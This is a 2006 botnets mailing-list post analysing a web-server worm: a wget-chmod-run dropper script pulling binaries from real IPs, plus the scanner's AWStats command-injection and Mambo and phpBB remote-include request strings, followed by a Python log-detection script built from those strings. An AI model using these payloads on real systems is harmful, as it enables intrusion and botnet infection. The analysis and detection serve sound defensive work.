To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------
This looks like more of LordNikon's handiwork.


On Fri, Mar 17, 2006 at 08:51:40AM +1300, Jamie Riden babbled thus:
> This seems to be quite popular at the moment.
> 
> Around Wed 8th March, I saw a drop using this method, described here -
> http://members.lycos.co.uk/jamieriden/mambo-exploit-obfuscated.pdf
> 
> Probably not news to most of you, but I was surprised at how many
> different computers were involved - 216.63.z.z - initiator, 66.98.a.a
> - server hosting the defacing tool, 216.99.b.b - machine we get the
> first stage payload from, 217.160.c.c - machine that we connect back
> to and 219.96.d.d - machine we get the second stage payload from.
> 
> Anyway, this morning we're back to the usual shell script -
> 
> #!/bin/bash
> wget 209.200.224.166/foc
> chmod 744 foc
> ./foc
> wget 209.200.224.166/iron
> chmod 744 iron
> ./iron
> 
> Where 'iron' has the following strings in the binary:
> 
> GET 
> %sawstats.pl?configdir=|echo;echo%%20YYY;cd%%20%%2ftmp%%3bwget%%2083%%2e16%%2e187%%2e6%%2fcacti%%3bchmod%%20%%2bx%%20cacti%%3b%%2e%%2fcacti;echo%%20YYY;echo|  HTTP/1.1
> Host: %s
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
> /index.php?option=com_content&do_pdf=1&id=1
> GET 
> %sindex.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.16.187.6/cmd.gif?&cmd=cd%%20/tmp;wget%%2083.16.187.6/cacti;chmod%%20744%%20cacti;./cacti;echo%%20YYY;echo|  HTTP/1.1
> Host: %s
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
> GET 
> %sadmin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%%20/tmp;wget%%2083.16.187.6/cacti;chmod%%20744%%20cacti;./cacti;echo%%20YYY;echo|  HTTP/1.1
> 
> and 'foc' looks like the IRC bot.
> 
> Note cmd.gif is the same or similar to a tool the Philippine Honeynet
> project describe as
> "'Defacing Tool 2.0 by r3v3ng4ns' is a suite of php based scripts
> that allows the attacker to send commands to the server primarily with
> the intent to deface websites. "
> 
> cheers,
>  Jamie

-- 
PinkFreud
Chief of Security, Nightstar IRC network
irc.nightstar.net | www.nightstar.net
Server Administrator - Blargh.CA.US.Nightstar.Net
Unsolicited advertisements sent to this address are NOT welcome.
_______________________________________________
All list and server information are public and available to law enforcement 
upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
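The three request templates in the 'iron' strings above are printf formats: '%s' is whatever path prefix the scanner fills in and '%%' is a literal '%' on the wire. The following is an added example, not code from the original post or from anyone on the list, that expands those templates the way the scanner would and then checks web-server access-log lines for the three probes (AWStats configdir command injection, Mambo mosConfig_absolute_path and phpBB phpbb_root_path remote includes) plus the shared wget/chmod dropper stage and the 'echo YYY' output marker. The log lines are constructed, and the '/' and '/cgi-bin/' prefixes substituted for '%s' are assumptions.

```python
"""Flag access-log requests matching the probes embedded in the 'iron' scanner.

Added example (not code from the original post).  The templates are copied
from the strings posted above; the log lines are constructed, and the path
prefixes used for '%s' are assumptions.
"""
import re
from urllib.parse import unquote, urlsplit

# printf-style templates from the binary: '%s' = path prefix, '%%' = literal '%'.
IRON_TEMPLATES = [
    "%sawstats.pl?configdir=|echo;echo%%20YYY;cd%%20%%2ftmp%%3bwget%%2083%%2e16"
    "%%2e187%%2e6%%2fcacti%%3bchmod%%20%%2bx%%20cacti%%3b%%2e%%2fcacti;echo%%20YYY;echo|",
    "%sindex.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&"
    "mosConfig_absolute_path=http://83.16.187.6/cmd.gif?&cmd=cd%%20/tmp;"
    "wget%%2083.16.187.6/cacti;chmod%%20744%%20cacti;./cacti;echo%%20YYY;echo|",
    "%sadmin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%%20/tmp;"
    "wget%%2083.16.187.6/cacti;chmod%%20744%%20cacti;./cacti;echo%%20YYY;echo|",
]
IRON_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

# Parameters these apps hand straight to include(): a URL value is a remote file include.
RFI_INCLUDE_PARAMS = {"mosconfig_absolute_path", "phpbb_root_path"}

# Apache combined log: client ident user [time] "method url proto" status bytes "referer" "agent"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" \d{3} \S+(?: "[^"]*" "([^"]*)")?')


def render_template(template, prefix="/"):
    """Expand the printf template as the scanner does: %s -> prefix, %% -> %."""
    return re.sub(r"%(s|%)", lambda m: prefix if m.group(1) == "s" else "%", template)


def parse_query(query):
    """Split on '&' only (the probes use ';' inside values) and percent-decode once."""
    params = {}
    for pair in query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            params[unquote(name)] = unquote(value)
    return params


def classify_request(url):
    """Return the set of indicator tags that match one request URL."""
    tags = set()
    parts = urlsplit(url)
    path = unquote(parts.path).lower()
    params = parse_query(parts.query)
    # AWStats interpolates configdir into a shell command: a pipe means injection.
    if path.endswith("awstats.pl") and "|" in params.get("configdir", ""):
        tags.add("awstats-configdir-cmdexec")
    # Mambo / phpBB: include path pointing at a remote URL.
    for name, value in params.items():
        if name.lower() in RFI_INCLUDE_PARAMS and re.match(r"https?://", value, re.I):
            tags.add("rfi:" + name.lower())
    # Payload stage shared by all three probes: download a dropper and run it.
    joined = " ".join(params.values())
    if re.search(r"\b(wget|curl)\s+\S+.*\bchmod\b", joined):
        tags.add("dropper-download-and-exec")
    if "echo YYY" in joined:  # delimiter the bot uses to find command output in the reply
        tags.add("output-marker-YYY")
    return tags


def scan_log(lines):
    """Return (client, url, sorted tags) for each log line that trips an indicator."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, url, agent = m.groups()
        tags = classify_request(url)
        # The hard-coded UA (stray ';' before ')') is too weak alone; only noted beside a real hit.
        if tags and agent == IRON_UA:
            tags.add("iron-user-agent")
        if tags:
            hits.append((client, url, sorted(tags)))
    return hits


SAMPLE_LOG = [  # constructed lines, not real captures
    '10.0.0.5 - - [17/Mar/2006:09:01:12 +1300] "GET /index.php?option=com_content&task=view&id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux)"',
    '198.51.100.7 - - [17/Mar/2006:09:02:33 +1300] "GET %s HTTP/1.1" 404 295 "-" "%s"' % (render_template(IRON_TEMPLATES[0], "/cgi-bin/"), IRON_UA),
    '198.51.100.7 - - [17/Mar/2006:09:02:34 +1300] "GET %s HTTP/1.1" 200 1810 "-" "%s"' % (render_template(IRON_TEMPLATES[1], "/"), IRON_UA),
    '198.51.100.7 - - [17/Mar/2006:09:02:35 +1300] "GET %s HTTP/1.1" 500 620 "-" "%s"' % (render_template(IRON_TEMPLATES[2], "/forum/"), IRON_UA),
]

if __name__ == "__main__":
    for client, url, tags in scan_log(SAMPLE_LOG):
        print(client, tags, url[:70])
```

The query parser deliberately splits on '&' alone and decodes each value exactly once; decoding twice would also catch double-encoded variants but would then misread legitimate values that contain a literal '%'. Keep the user-agent match as corroboration only, since it is trivially changed between scanner builds.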